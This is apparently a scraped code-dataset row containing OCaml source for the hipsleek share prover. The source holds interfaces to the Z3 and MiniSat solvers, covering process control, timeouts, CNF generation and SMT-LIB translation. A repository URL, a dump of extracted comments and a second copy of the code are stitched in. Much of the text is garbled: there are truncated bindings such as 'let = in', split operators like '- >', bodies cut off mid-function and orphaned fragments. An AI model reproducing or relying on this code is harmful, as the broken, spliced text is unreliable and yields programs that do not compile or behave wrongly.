let () = print_string (reason ^ " not restarting minisat ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in ()
)
(* Runs the specified prover and returns output *)
(* Write the DIMACS [input] to a random /tmp file, run minisat on it under
   [timeout], and return whether it reported SATISFIABLE. On timeout or
   any other exception the process is killed and [false] is returned
   (the comment below calls this the safe answer for soundness).
   NOTE(review): the result file "minisatres.txt" is a fixed relative name
   (racy under concurrent runs) and is never deleted — only [infile] is
   removed; confirm whether that is intentional. *)
let check_problem_through_file (input: string) (timeout: float) : bool =
  (* debug *)
  (* let () = print_endline "** In function minisat.check_problem" in *)
  let file_suffix = Random.int 1000000 in
  let infile = "/tmp/in" ^ (string_of_int file_suffix) ^ ".cnf" in
  (*let () = print_endline ("-- input: \n" ^ input) in*)
  let out_stream = open_out infile in
  output_string out_stream input;
  close_out out_stream;
  let minisat_result="minisatres.txt" in
  let set_process proc = minisat_process := proc in
  let fnc () =
    if (minisat_input_format = "cnf") then (
      PrvComms.start (minisat_name, minisat_path, [|minisat_arg;infile;minisat_result|]) set_process;
      minisat_call_count := !minisat_call_count + 1;
      (* verdict is parsed from the prover's stdout, not from the result file *)
      let (prover_output, running_state) = get_answer !minisat_process.PrvComms.inchannel in
      is_minisat_running := running_state;
      prover_output;
    )
    else failwith "[minisat.ml] The value of minisat_input_format is invalid!" in
  let res =
    try
      let fail_with_timeout () = restart ("[minisat]Timeout when checking sat!" ^ (string_of_float timeout)); false in
      let res = PrvComms.maybe_raise_and_catch_timeout fnc () timeout fail_with_timeout in
      res
    with _ -> ((* exception : return the safe result to ensure soundness *)
        Printexc.print_backtrace stdout;
        print_endline ("WARNING: Restarting prover due to timeout");
        Unix.kill !minisat_process.PrvComms.pid 9;
        ignore (Unix.waitpid [] !minisat_process.PrvComms.pid);
        false
      ) in
  let () = PrvComms.stop !minisat_process 0 9 in
  remove_file infile;
  res
(**************************************************************
MAIN INTERFACE : CHECKING IMPLICATION AND SATISFIABILITY
*************************************************************)
(*******************zzzzzzzzzzzzzz****************)
(*generate the CNF *)
(* Render a CNF formula in DIMACS format: a "p cnf <vars> <clauses>" header
   followed by one 0-terminated line per clause, where a literal (v, sign)
   prints as "v" when positive and "-v" when negated. *)
let cnf_to_string var_cnt f : string =
  let literal (v, sign) = if sign then string_of_int v else "-" ^ string_of_int v in
  let clause cl = String.concat " " (List.map literal cl) in
  let header = "p cnf " ^ string_of_int var_cnt ^ " " ^ string_of_int (List.length f) ^ "\n" in
  header ^ String.concat " 0\n" (List.map clause f) ^ " 0\n"
(* CNF clauses for v3 = v1 XOR v2 under the extra share constraint that v1
   and v2 cannot both hold (first clause).
   Fix: the third clause's code was lost in extraction, leaving only its
   comment "~v1 | v2 | v3"; it is reconstructed here as
   [(sv1,false);(sv2,true);(sv3,true)], completing the standard XOR
   encoding together with the remaining three clauses. *)
let xor sv1 sv2 sv3 = [ [(sv1, false);(sv2,false)];           (* ~v1 | ~v2      *)
                        [(sv1,true);(sv2,true);(sv3,false)];  (*  v1 |  v2 | ~v3 *)
                        [(sv1,false);(sv2,true);(sv3,true)];  (* ~v1 |  v2 |  v3 *)
                        [(sv1,true);(sv2,false);(sv3,true)]]  (*  v1 | ~v2 |  v3 *)
(* Clauses for v1 XOR v2 = true: exactly one of the two holds. *)
let xorc sv1 sv2 = [[(sv1, true);(sv2,true)];[(sv1, false);(sv2,false)]]
(* Clauses for v1 = v2 (logical equivalence of two variables). *)
let trans_vv sv1 sv2 = [[(sv1, true);(sv2,false)];[(sv1, false);(sv2,true)]]
(* Flip the polarity of every occurrence of variable [v] in CNF [f]. *)
let negVar v f =
  let flip (var, sign) = if var = v then (var, not sign) else (var, sign) in
  List.map (List.map flip) f
(* A clause is a tautology when some variable occurs with both polarities. *)
let rec tauto = function
  | [] -> false
  | (v, sign) :: rest ->
    List.exists (fun (v', sign') -> v = v' && sign <> sign') rest || tauto rest
(* CNF of the negation of CNF [f]: every literal is flipped, turning f's
   clause list into a conjunction-of-negated-clauses, which is then
   distributed back into clause form by taking one literal from each
   original clause (cross product, folded clause by clause); tautological
   clauses are filtered as they appear. Exponential in the worst case.
   List.hd/List.tl are safe here: the empty case is returned early. *)
let neg_f f =
  let f = List.map (List.map (fun (c,b)-> c,not b)) f in
  if f=[] then f
  else List.fold_left (fun a c->
      let r = List.concat (List.map (fun c-> List.map (fun d-> c::d) a) c) in
      List.filter (fun c->not (tauto c)) r) (List.map (fun c-> [c]) (List.hd f)) (List.tl f)
(* Disjunction of two CNF formulas by clause-wise distribution: each clause
   of [f1] is concatenated with each clause of [f2]; tautological results
   are dropped. Quadratic in the clause counts. *)
let mkOr f1 f2 =
  let l = List.map (fun l -> List.map (fun l2 -> l@l2) f2) f1 in
  List.filter (fun c-> not (tauto c)) (List.concat l)
(* Existentially quantify the variables [vl] away from CNF [f]. Variables
   not occurring in [f] are skipped; for each remaining v, f is replaced by
   mkOr f (negVar v f), i.e. F \/ F[v := ~v].
   NOTE(review): confirm this matches the intended Boolean existential
   F[v:=0] \/ F[v:=1] for this share encoding — it is not the textbook
   cofactor form. *)
let mkExists vl f =
  let fv = List.fold_left (fun a c-> a@ (List.map fst c)) [] f in
  let vl = List.filter (fun c-> List.mem c fv) vl in
  List.fold_left (fun f v-> mkOr f (negVar v f)) f vl
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found -> (tp:= !tp+1; Hashtbl.add ht v !tp;!tp) in
let trans_eq (v1,v2,c) = match c with
| C_top -> xorc (get_var v1) (get_var v2)
| PVar v3-> xor (get_var v1) (get_var v2) (get_var v3) in
let ante_f =
let nz = List.map (List.map (fun c-> get_var c, true)) a_nz_cons in (*conj of disj*)
let eqs = List.map trans_eq a_l_eqs in
let a_ev = List.map get_var a_ev in
mkExists a_ev (List.concat (nz::eqs)) in
let conseq_f =
let c_ev = List.map get_var c_ev in
let nz = List.map (List.map (fun c-> get_var c, true)) c_nz_cons in (*conj of disj*)
let eqs = List.map trans_eq c_l_eqs in
let c_subst = List.map (fun (v1,v2) -> trans_vv (get_var v1)(get_var v2)) c_subst_vars in
let c_const = List.map (fun (v,b) -> [[(get_var v, b)]]) c_const_vars in
let r = List.concat (nz::eqs@c_subst@c_const) in
let r = List.map (List.filter (fun (c,_)-> not (List.mem c c_ev))) (neg_f r) in
List.filter (fun c-> c<>[]) r in
let all_f = ante_f@conseq_f in
if all_f<>[] then
not (check_problem_through_file (cnf_to_string !tp (ante_f@conseq_f)) 0.)
else true
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst)
(c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
(* to delete *)
let nzsf l = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) l ) in
let pr_list f l = String.concat " \n " ( List.map f l ) in
let pr_pair f1 f2 ( ) = " ( " ^(f1 x1)^","^(f2 x2)^ " ) " in
(* let consl = pr_list (pr_pair Sv.string_of string_of_bool) c_const_vars in *)
(* let cvel = pr_list (pr_pair Sv.string_of Sv.string_of) c_subst_vars in *)
let anzs = nzsf a_nz_cons in
let cnzs = nzsf c_nz_cons in
let aeqss = string_of_eq_l a_l_eqs in
let = in
print_string ( " MINISAT IMPLY\n ante : nz : " ^anzs^";\n ex : " ^(pr_list Sv.string_of a_ev)^";\n eqs : " ^aeqss^";\n " ) ;
print_string ( " conseq : nz : " ^cnzs^";\n ex : " ^(pr_list Sv.string_of c_ev)^";\n veq : " ^cvel^";\n cons : " ^consl^";\n eqs : " ^ceqss^";\n " ) ;
(* to delete *)
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
( " r : " ^(string_of_bool r ) ) ;
r
let call_sat non_zeros eqs =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found ->
(tp:= !tp+1;
( v^ " " ^(string_of_int ! tp)^"\n " ) ;
let input =
let nz = List.map (List.map (fun c-> get_var c, true)) non_zeros in (*conj of disj*)
let eqs = List.map ( fun (v1,v2,c)->
let sv1 = get_var v1 in
let sv2 = get_var v2 in
match c with
| C_top -> xorc sv1 sv2
| PVar v3-> xor sv1 sv2 (get_var v3) ) eqs in
List.concat (nz::eqs) in
if input<> [] then
let input_str = cnf_to_string !tp input in
( input_str^"\n " ) ;
check_problem_through_file input_str minisat_timeout_limit
else true
let call_sat non_zeros eqs =
(* to delete *)
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
(* print_string ("MINISAT SAT: "^nzs^"\n"^eqss^"\n"); *)
(* (\* to delete *\) *)
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
module Solver_Z3 = Share_prover.Dfrac_s_solver(Ts)(Share_prover.Sv)(Ss_Z3_proc)
module Solver_mini = Share_prover.Dfrac_s_solver(Share_prover.Ts)(Share_prover.Sv)(Ss_minisat_proc)
module Solver = Solver_mini
module Eqs =
struct
type var = Sv.t
type const = Ts.stree
type pcvar = Solver.frac_perm
type eq = Solver.eq
type eq_syst = Solver.eq_syst
let mkVar = Sv.var_of
let mkEq v1 v2 v3 = (v1,v2,v3)
let mkEqS l1 l2 l3 l4 l5= {Solver.eqs_ex = l1; Solver.eqs_nzv = l2; Solver.eqs_ve=l3; Solver.eqs_vc=l4; Solver.eqs_eql = l5}
let mkcFull = Ts.top
let mkcEmpty = Ts.bot
let mkcNode = Ts.mkNode
let mkpcCnst c = Solver.Cperm c
let mkpcVar v = Solver.Vperm v
end;;
type cmd =
| Sat of Eqs.eq_syst
| Imply of Eqs.eq_syst * Eqs.eq_syst;;
| null | https://raw.githubusercontent.com/hipsleek/hipsleek/596f7fa7f67444c8309da2ca86ba4c47d376618c/bef_indent/shares_z3_lib.ml | ocaml | same as maybe_raise_timoeut just that it treats the timeout exception with the with_timeout function
closes the pipes of the named process
to delete
struct
type nz_cons = t_var list list
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let mkTop () = C_top
(\**********Z3 interface **********\)
(\** Create a boolean variable using the given name. *\)
let mk_sv_bool_var ctx sv = mk_bool_var ctx (Sv.get_name sv)
(\** Create a logical context. Enable model construction. Also enable tracing to stderr. *\)
let mk_context ()=
let cfg = Z3.mk_config () in
Z3.trace_to_stderr ctx;
ctx
let check ctx =(match Z3.check ctx with
| Z3.L_FALSE -> false
| Z3.L_TRUE -> true )
let add_eqs ctx =
List.iter (fun (v1,v2,v3)->
let bv1 = mk_sv_bool_var ctx v1 in
match v3 with
| C_top -> Z3.assert_cnstr ctx xor12
)
let add_nz ctx = List.iter (add_one_nz ctx)
let check_sat_nz ctx non_zeros =
Z3.push ctx;
else
List.for_all (fun l ->
Z3.push ctx;
add_one_nz ctx l;
let r= check ctx in
Z3.pop ctx 1;
r) non_zeros )
let ctx = mk_context () in
let r = check_sat_nz ctx non_zeros in
print_string ("r: "^(string_of_bool r)^"\n"); r
let ctx = mk_context () in
add_eqs ctx a_l_eqs;
print_string "added eqs\n";flush_all ();
if not (check_sat_nz ctx a_nz_cons) then (Z3.del_context ctx;true)
else
print_string "added exists\n";flush_all ();
try
Hashtbl.find tbl nm
with Not_found -> mk_bool_var ctx nm in
let conseq =
let z3v = mk_sv_bool_var_ex v in
Z3.mk_and ctx [| a ; z3v|]
) (Z3.mk_true ctx) c_const_vars in
let f_sv = List.fold_left (fun a (v1,v2)->
let z3v1 = mk_sv_bool_var_ex v1 in
let z3eq = Z3.mk_eq ctx z3v1 z3v2 in
) f_ccv c_subst_vars in
let f_nz = List.fold_left (fun a l ->
Z3.mk_and ctx [|a;Z3.mk_or ctx nz_arr|]
) f_sv c_nz_cons in
let f_eqs = List.fold_left (fun a (v1,v2,v3)->
let z3v1 = mk_sv_bool_var_ex v1 in
let f1 = Z3.mk_not ctx (Z3.mk_and ctx [|z3v1;z3v2|]) in
let a = Z3.mk_and ctx [|a;f1|] in
match v3 with
| C_top -> Z3.mk_and ctx [| a; xor12 |]
) f_nz c_l_eqs in
let types = Array.init l (fun _ -> bool_sort) in
let names = Array.init l (Z3.mk_int_symbol ctx) in
Z3.mk_forall ctx 0 [||] types names f_eqs in
print_string "constructed conseq\n";flush_all ();
print_string "added conseq\n";flush_all ();
let r = Z3.check ctx in
print_string "actuall check\n";flush_all ();
Z3.del_context ctx;
match r with
| Z3.L_FALSE -> true
| Z3.L_UNDEF -> print_string "unknown\n"; false
| Z3.L_TRUE -> false
let nzs =
String.concat "," (
print_string ("r: "^(string_of_bool r)); r
end;;
to delete
**********************************************************************************
*********Z3 interface *********
*********Z3 interface *********
*********Z3 interface *********
*********Z3 interface *********
**************************************************************
INTERATION
*************************************************************
solver returns sat
solver returns unsat
solver returns unknown or there is an exception
solver returns an exception
something diff to sat/unsat/unknown, retry-may lead to timeout here
Global settings
*********
"z3"
start z3 system in a separated process and load redlog package
send formula to z3 and receive result -true/false/unknown
**********************************************************************************
*********minisat interface *********
Global settings
minisat
valid value is: cnf
**************************************************************
INTERACTION
*************************************************************
output: - prover_output - the running status of prover: true if running, otherwise false
stop minisat system
Runs the specified prover and returns output
debug
let () = print_endline "** In function minisat.check_problem" in
let () = print_endline ("-- input: \n" ^ input) in
exception : return the safe result to ensure soundness
*************************************************************
MAIN INTERFACE : CHECKING IMPLICATION AND SATISFIABILITY
************************************************************
******************zzzzzzzzzzzzzz***************
generate the CNF
~v1 | ~v2
v1 | v2 | ~v3
v1 | ~v2| v3
conj of disj
conj of disj
to delete
let consl = pr_list (pr_pair Sv.string_of string_of_bool) c_const_vars in
let cvel = pr_list (pr_pair Sv.string_of Sv.string_of) c_subst_vars in
to delete
conj of disj
to delete
print_string ("MINISAT SAT: "^nzs^"\n"^eqss^"\n");
(\* to delete *\) | #include "xdebug.cppo"
open Share_prover
module PrvComms =
struct
type proc = {name:string; pid: int; inchannel: in_channel; outchannel: out_channel; errchannel: in_channel }
exception Timeout
external set_close_on_exec : Unix.file_descr -> unit = "unix_set_close_on_exec";;
let try_set_close_on_exec fd =
try set_close_on_exec fd; true with Invalid_argument _ -> false
let open_proc_full cmd args input output error toclose =
let cloexec = List.for_all try_set_close_on_exec toclose in
match Unix.fork() with
0 -> Unix.dup2 input Unix.stdin; Unix.close input;
Unix.dup2 output Unix.stdout; Unix.close output;
Unix.dup2 error Unix.stderr; Unix.close error;
if not cloexec then List.iter Unix.close toclose;
begin try Unix.execvp cmd args
with _ -> exit 127
end
| id -> id
let open_process_full cmd args =
let (in_read, in_write) = Unix.pipe() in
let (out_read, out_write) = Unix.pipe() in
let (err_read, err_write) = Unix.pipe() in
let inchan = Unix.in_channel_of_descr in_read in
let outchan = Unix.out_channel_of_descr out_write in
let errchan = Unix.in_channel_of_descr err_read in
let id = open_proc_full cmd args out_read in_write err_write [in_read; out_write; err_read] in
Unix.close out_read;
Unix.close in_write;
Unix.close err_write;
(inchan, outchan, errchan, id)
let open_proc cmd args out_file:int =
match Unix.fork() with
| 0 -> begin
let output = Unix.openfile out_file [Unix.O_CREAT;Unix.O_WRONLY] 0o640 in
Unix.dup2 output Unix.stdout; Unix.close output;
try Unix.execvp cmd args with _ -> exit 127 end
| id -> id
let sigalrm_handler = Sys.Signal_handle (fun _ -> raise Timeout)
let set_timer tsecs = ignore (Unix.setitimer Unix.ITIMER_REAL { Unix.it_interval = 0.0; Unix.it_value = tsecs })
let maybe_raise_and_catch_timeout (fnc: 'a -> 'b) (arg: 'a) (tsec: float) (with_timeout: unit -> 'b): 'b =
try
let old_handler = Sys.signal Sys.sigalrm sigalrm_handler in
let reset_sigalrm () = Sys.set_signal Sys.sigalrm old_handler in
let () = set_timer tsec in
let answ = fnc arg in
set_timer 0.0;
reset_sigalrm ();
answ
with
| Timeout ->
Printf.eprintf " maybe_raise_and_catch_timeout : UNEXPECTED Timeout after %s secs" (string_of_float tsec);
(with_timeout ())
| exc -> begin
Printf.eprintf " maybe_raise_and_catch_timeout : Unexpected exception : %s" (Printexc.to_string exc);
raise exc
end
let close_pipes (process: proc) : unit =
(try
flush process.outchannel;
Unix.close (Unix.descr_of_out_channel process.outchannel);
Unix.close (Unix.descr_of_in_channel process.errchannel)
with | e -> () );
(try
Unix.close (Unix.descr_of_in_channel process.inchannel)
with | e -> () )
let start (prover: string * string * string array) set_process =
let (prover_name, prover_proc, prover_arg_array) = prover in
try
let inchn, outchn, errchn, npid = open_process_full prover_proc prover_arg_array in
let process = {name = prover_name; pid = npid; inchannel = inchn; outchannel = outchn; errchannel = errchn} in
set_process process
with
| e -> begin
let () = print_string ("\n["^prover_name^".ml ]Unexpected exception while starting prover "^ prover_name ^ "\n") in
flush stdout; flush stderr;
raise e
end
let stop (process:proc) (invocations: int) (killing_signal: int) =
close_pipes process;
try
Unix.kill process.pid killing_signal;
ignore (Unix.waitpid [] process.pid)
with
| e -> ()
let restart start stop = stop (); start ()
module Ss_Z3 : SAT_SLV = functor ( Sv : SV ) - >
type t_var = Sv.t
type p_var = ( \*include Gen. EQ_TYPE with type t = v*\ )
| PVar of t_var
let stringofPvar v = match v with | C_top - > " T " | PVar v - > Sv.string_of v
let mkVar v = PVar v
let v = match v with | C_top - > None | PVar v - > Some v
let string_of_eq ( v1,v2,v3 ) = ( Sv.string_of v1)^ " * " ^(Sv.string_of v2)^ " = " ^(match v3 with | PVar v3 - > Sv.string_of v3 | _ - > " true " )
let string_of_eq_l l = String.concat " \n " ( List.map string_of_eq l )
let mk_bool_var ctx name = Z3.mk_const ctx ( ctx name ) ( Z3.mk_bool_sort ctx )
Z3.set_param_value cfg " MODEL " " false " ;
let ctx = in
( \ * * Check if ctx is sat . if sat , then could get the )
| Z3.L_UNDEF - > print_string " unknown\n " ; failwith " unknown sat "
let bv2 = mk_sv_bool_var ctx v2 in
let xor12 = Z3.mk_xor ctx bv1 bv2 in
| PVar v3- >
( Z3.assert_cnstr ctx ( Z3.mk_not ctx ( Z3.mk_and ctx [ |bv1;bv2| ] ) ) ;
ctx ( Z3.mk_eq ctx xor12 ( mk_sv_bool_var ctx v3 ) ) )
let add_one_nz ctx l= Z3.assert_cnstr ctx ( Z3.mk_or ctx ( Array.of_list ( List.map ( mk_sv_bool_var ctx ) l ) ) )
add_nz ;
if check ctx then ( Z3.pop ctx 1;true )
( Z3.pop ctx 1 ;
let call_sat non_zeros eqs =
add_eqs ctx eqs ;
Z3.del_context ; r
let call_sat non_zeros eqs =
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
print_string ( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
let = Hashtbl.create 20 in
let bool_sort = Z3.mk_bool_sort ctx in
let ( ) = List.fold_left ( fun c v- > Hashtbl.add tbl ( Sv.get_name v ) ( Z3.mk_bound ctx c bool_sort ) ; c+1 ) 1 c_ev in
let v =
let in
let f_ccv = List.fold_left ( fun a ( v , c)- >
let z3v = if c then z3v else Z3.mk_not ctx z3v in
let z3v2 = in
Z3.mk_and ctx [ |a ; z3eq| ]
let nz_arr = Array.of_list ( List.map mk_sv_bool_var_ex l ) in
let z3v2 = in
let xor12 = Z3.mk_xor ctx z3v1 z3v2 in
| PVar v3 - > Z3.mk_and ctx [ | a ; Z3.mk_eq ctx xor12 ( mk_sv_bool_var_ex v3 ) | ]
let l = c_ev in
Z3.assert_cnstr ctx ( Z3.mk_not ) ;
let call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons =
List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) a_nz_cons ) in
let eqss = string_of_eq_l a_l_eqs in
print_string ( " \n Imply : " ^nzs^"\n"^eqss^"\n");flush_all ( ) ;
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
module Ss_Z3_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
let smt_of_acons (v,c) = if c then Sv.string_of v else "(not " ^(Sv.string_of v) ^" )"
let smt_of_asub (v1,v2) = "(= " ^(Sv.string_of v1) ^ " " ^ (Sv.string_of v2) ^ ")"
let smt_of_eq (v1,v2,v3) =
" (= " ^ " ( and " ^(Sv.string_of v1)^ " " ^ ( Sv.string_of v2)^ " ) " ^ " " ^ ( match v3 with PVar v- > Sv.string_of v | _ - > " 1 " ) ^ " ) "
let xor12 = "(xor " ^(Sv.string_of v1)^ " " ^ (Sv.string_of v2)^")" in
match v3 with
| PVar v3->
let eq = "(= " ^ xor12 ^ " " ^ (Sv.string_of v3) ^ ")" in
let neq = "(not (and " ^ (Sv.string_of v1)^ " " ^ (Sv.string_of v2) ^ " ) )" in
"(and " ^ eq^ " " ^ neq ^ " )"
| C_top -> xor12
let smt_of_anz nz = match nz with
| [] -> failwith "error, unexpected empty nz"
| h::t -> List.fold_left (fun a c-> "(or " ^ a ^ " " ^ (Sv.string_of c) ^ ")") (Sv.string_of h) t
let smt_of_ante (_,anz,asub,acons,aeq) =
let acons = List.map (fun c-> "(assert " ^ (smt_of_acons c) ^ ")\n") acons in
let asub = List.map (fun c-> "(assert " ^ (smt_of_asub c) ^ ")\n") asub in
let aeq = List.map (fun c-> "(assert " ^ (smt_of_eq c) ^ ")\n") aeq in
let anz = List.map (fun c-> "(assert " ^ (smt_of_anz c) ^ ")\n") anz in
String.concat "" (acons@asub@aeq@anz)
let smt_of_conseq (cex,cnz,csub,ccons,ceq) =
let ccons = List.map smt_of_acons ccons in
let csub = List.map smt_of_asub csub in
let ceq = List.map smt_of_eq ceq in
let cnz = List.map smt_of_anz cnz in
let s = List.fold_left (fun a c-> "(and " ^ a ^ " " ^ c ^ ")") "true" (ccons@csub@ceq@cnz) in
List.fold_left (fun a c -> "(exists ((" ^ (Sv.string_of c) ^ " Bool)) " ^ a ^ ")") s cex
type sat_type =
Collect all Z3 's output into a list of strings
let rec icollect_output chn accumulated_output : string list =
let output = try
let line = input_line chn in
icollect_output chn (accumulated_output @ [line])
else accumulated_output @ [line]
with
| End_of_file -> accumulated_output in
output
let sat_type_from_string r input=
if (r = "sat") then Sat
else if (r = "unsat") then UnSat
else
try
let (todo_unk:int) = Str.search_forward (Str.regexp "unexpected") r 0 in
(print_string "Z3 translation failure!"; failwith ("Z3 translation failure!!\n"^r^"\n input: "^input))
with
| Not_found -> Unknown
let iget_answer chn input=
let output = icollect_output chn [] in
sat_type_from_string (List.nth output (List.length output - 1)) input
let remove_file filename = try Sys.remove filename with | e -> ()
let prover_process = ref {
PrvComms.name = "z3";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
let smtsolver_name = ref ("z3": string)
let z3_call_count: int ref = ref 0
let is_z3_running = ref false
let test_number = ref 0
let last_test_number = ref 0
let z3_restart_interval = ref (-1)
let smtsolver_name = ref ("z3": string)
and start() =
if not !is_z3_running then begin
print_string "Starting z3... \n"; flush stdout;
last_test_number := !test_number;
PrvComms.start (!smtsolver_name, !smtsolver_name, [|!smtsolver_name;"-smt2"; "-si"|]) (fun proc -> prover_process := proc);
is_z3_running := true;
end
stop Z3 system
let stop () =
if !is_z3_running then begin
let num_tasks = !test_number - !last_test_number in
print_string ("Stop z3... "^(string_of_int !z3_call_count)^" invocations "); flush stdout;
let () = PrvComms.stop !prover_process num_tasks Sys.sigkill in
is_z3_running := false;
end
restart Z3 system
let restart reason =
if !is_z3_running then
let () = print_string (reason^" Restarting z3 after ... "^(string_of_int !z3_call_count)^" invocations ") in
PrvComms.restart start stop
else print_string (reason^" not restarting z3 ... "^(string_of_int !z3_call_count)^" invocations ")
let check_formula f timeout =
begin
if not !is_z3_running then start ()
else if (!z3_call_count = !z3_restart_interval) then
begin
restart("Regularly restart:1 ");
z3_call_count := 0;
end;
let fnc f =
incr z3_call_count;
output_string (!prover_process.PrvComms.outchannel) ("(push)\n" ^ f ^ "(pop)\n");
flush (!prover_process.PrvComms.outchannel);
iget_answer (!prover_process.PrvComms.inchannel) f
in
let fail_with_timeout () = restart ("[z3.ml]Timeout when checking sat!" ^ (string_of_float timeout)); Unknown in
PrvComms.maybe_raise_and_catch_timeout fnc f timeout fail_with_timeout
end
let rec rem_dups l = match l with [] -> [] | q::qs -> if (List.exists (Sv.eq q) qs) then rem_dups qs else q::(rem_dups qs)
let fv (exv,nz,subs,cons,eqs)=
let w1,w2 = List.split subs in
let fv_eq (v1,v2,v3)= v1::v2::(match v3 with C_top -> [] | PVar v-> [v]) in
exv@(List.concat nz)@(fst (List.split cons))@w1@w2@(List.concat (List.map fv_eq eqs))
let to_smt ante conseq : string =
let conseq1 = match conseq with
| None -> ([],[],[],[],[])
| Some f -> f in
let all_fv = rem_dups (fv ante @ fv conseq1) in
let smt_var_decls = String.concat "" (List.map (fun v -> "(declare-fun " ^ (Sv.string_of v) ^ " () Bool)\n" ) all_fv) in
let ante_str = smt_of_ante ante in
let conseq_str = if conseq=None then "false" else smt_of_conseq conseq1 in
( ";Variables declarations\n" ^smt_var_decls ^ ";Antecedent\n" ^ ante_str ^ ";Negation of Consequence\n" ^ "(assert (not " ^ conseq_str ^ "))\n" ^ "(check-sat)")
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst)
(c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let input = to_smt (a_ev, a_nz_cons, [],[],a_l_eqs) (Some (c_ev, c_nz_cons, c_subst_vars, c_const_vars, c_l_eqs)) in
( " \n \n z3 input : " ^(input)^"\n " ) ;
match check_formula input 0. with
| Sat -> false
| UnSat -> true
| Unknown -> false
| Aborted -> false
let call_sat non_zeros eqs =
match (check_formula (to_smt ([],non_zeros,[],[],eqs) None)) 10.0 with
| UnSat -> false
| _ -> true
let call_sat non_zeros eqs =
let nzs = String.concat "," (List.map (fun l-> "{"^(String.concat "," (List.map Sv.string_of l))^"}") non_zeros) in
let eqss = string_of_eq_l eqs in
( " Z3 SAT : " ^nzs^"\n"^eqss^"\n " ) ;
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
module Ss_minisat_proc:SAT_SLV = functor (Sv:SV) ->
struct
type t_var = Sv.t
type nz_cons = t_var list list
include Gen. EQ_TYPE with type t = v
| PVar of t_var
| C_top
type eq_syst = (t_var*t_var*p_var) list
let stringofTvar = Sv.string_of
let stringofPvar v = match v with | C_top -> "T" | PVar v -> Sv.string_of v
let mkTop () = C_top
let mkVar v = PVar v
let getVar v = match v with | C_top -> None | PVar v -> Some v
let string_of_eq (v1,v2,v3) = (Sv.string_of v1)^" * "^(Sv.string_of v2)^" = "^(match v3 with | PVar v3 -> Sv.string_of v3 | _ -> " true")
let string_of_eq_l l = String.concat "\n" (List.map string_of_eq l)
let minisat_timeout_limit = 15.0
let test_number = ref 0
let last_test_number = ref 0
let minisat_restart_interval = ref (-1)
let log_all_flag = ref false
let is_minisat_running = ref false
default timeout is 15 seconds
let minisat_call_count: int ref = ref 0
let log_file = open_out ("allinput.minisat")
valid value is : " file " or " stdin "
let minisat_path = "/usr/local/bin/minisat"
let minisat_name = "minisat"
let minisat_arg = "-pre"
let number_clauses = ref 1
let number_var = ref 0
let minisat_process = ref { PrvComms.name = "minisat";
PrvComms.pid = 0;
PrvComms.inchannel = stdin;
PrvComms.outchannel = stdout;
PrvComms.errchannel = stdin
}
let rec collect_output (chn: in_channel) : (string * bool) =
try
let line = input_line chn in
if line = "SATISFIABLE" then
(line, true)
else
collect_output chn
with
| End_of_file -> ("", false)
let get_prover_result (output : string) :bool =
let validity =
if (output="SATISFIABLE") then
true
else
false in
validity
let get_answer (chn: in_channel) : (bool * bool)=
let (output, running_state) = collect_output chn in
let
validity_result = get_prover_result output;
in
(validity_result, running_state)
let remove_file filename =
try Sys.remove filename;
with e -> ignore e
let set_process proc =
minisat_process := proc
let start () =
if not !is_minisat_running then (
print_endline_quiet ("Starting Minisat... \n");
last_test_number := !test_number;
if (minisat_input_format = "cnf") then (
PrvComms.start (minisat_name, minisat_path, [|minisat_arg|]) set_process;
is_minisat_running := true;
)
)
let stop () =
if !is_minisat_running then (
let num_tasks = !test_number - !last_test_number in
print_string ("\nStop Minisat... " ^ (string_of_int !minisat_call_count) ^ " invocations "); flush stdout;
let () = PrvComms.stop !minisat_process num_tasks Sys.sigkill in
is_minisat_running := false;
)
restart Omega system
let restart reason =
